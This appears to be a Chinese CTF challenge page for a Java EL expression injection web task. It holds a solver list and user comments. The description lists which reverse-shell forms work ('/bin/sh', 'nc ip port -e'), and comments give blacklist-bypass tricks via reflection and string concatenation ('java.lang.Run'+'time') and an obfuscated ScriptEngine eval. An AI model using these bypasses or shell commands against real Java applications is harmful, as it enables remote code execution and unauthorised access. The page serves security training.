Java EL表达式注入WEB 未解决
分数:
35
金币:
4
题目作者:
云牧青
一 血:
广告位招租
一血奖励:
10金币
解 决:
77
提 示:
描 述:
/bin/bash: X ; /bin/sh √ ; /dev/tcp X ; nc -e ip port X ; nc ip port -e √ ;
评分(2)
解题动态
M1crow3ve 攻破了该题 15天前
Bug@Bug 攻破了该题 17天前
admin666 攻破了该题 25天前
liusongxn 攻破了该题 1月前
kukuqi666 攻破了该题 1月前
ilovevicky99 攻破了该题 2月前
是大方子 攻破了该题 3月前
JJJleo 攻破了该题 3月前
帅气的冬瓜 攻破了该题 3月前
雾島风起時 攻破了该题 4月前
tingsi464 攻破了该题 5月前
tfios 攻破了该题 5月前
minshenyao 攻破了该题 6月前
15999935435 攻破了该题 6月前
Rannnn 攻破了该题 6月前
刘灏。 攻破了该题 8月前
modeng 攻破了该题 8月前
rookiee 攻破了该题 8月前
Yoruko39 攻破了该题 8月前
评论
l1nci 4月前
举报
做不出来,金币-5,呜呜呜
ailx10 10月前
举报
嘻嘻,参考:https://zhuanlan.zhihu.com/p/721560334
lzhui 1年前
举报
金币 -5
blackjack009 1年前
举报
new javax.script.ScriptEngineManager().getEngineByName(new String(new byte[]{106,115})).eval(new String(new byte[]{106...........}));
jack12138 2年前
举报
利用Java反射机制实现RCE,参考:http://www.hackdig.com/08/hack-459909.htm,题中用''.getClass()替代了Class,黑名单可利用字符串拼接绕过,如''.getClass().forName('java.lang.Run'+'time')
jack12138 2年前
举报
没做出来,记录一下,应该跟 MVEL.eval 有关系?没试出来
chips 2年前
举报
好难 金币-5
笨笨笨蛋 2年前
举报
金币-5 寄了,求一个思路
杠上开花 3年前
举报
黑名单把字符串拆开即可
bigcaicai 3年前
举报
求大佬指导一下,在本地测试时,mvel不能赋值,导致无法使用fastjson的那个利用链,要怎么绕过黑名单